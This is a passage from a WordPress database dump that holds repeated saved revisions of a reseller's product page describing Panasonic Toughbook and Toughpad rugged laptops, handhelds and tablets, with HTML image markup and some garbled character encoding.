src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-21 09:51:13','2018-12-21 01:51:13','',2580,'https://bintara.com.my/blog/2018/12/21/2580-revision-v1/',0,'revision','',0),(2688,1,'2018-12-21 09:51:36','2018-12-21 01:51:36','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5><strong>PRODUCT</strong> DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header><h5>PRODUCT DETAILS</h5><p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-21 09:51:36','2018-12-21 01:51:36','',2580,'https://bintara.com.my/blog/2018/12/21/2580-revision-v1/',0,'revision','',0),(2689,1,'2018-12-21 09:52:38','2018-12-21 01:52:38','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5><strong>PRODUCT</strong> DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header><h5>PRODUCT DETAILS</h5><p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		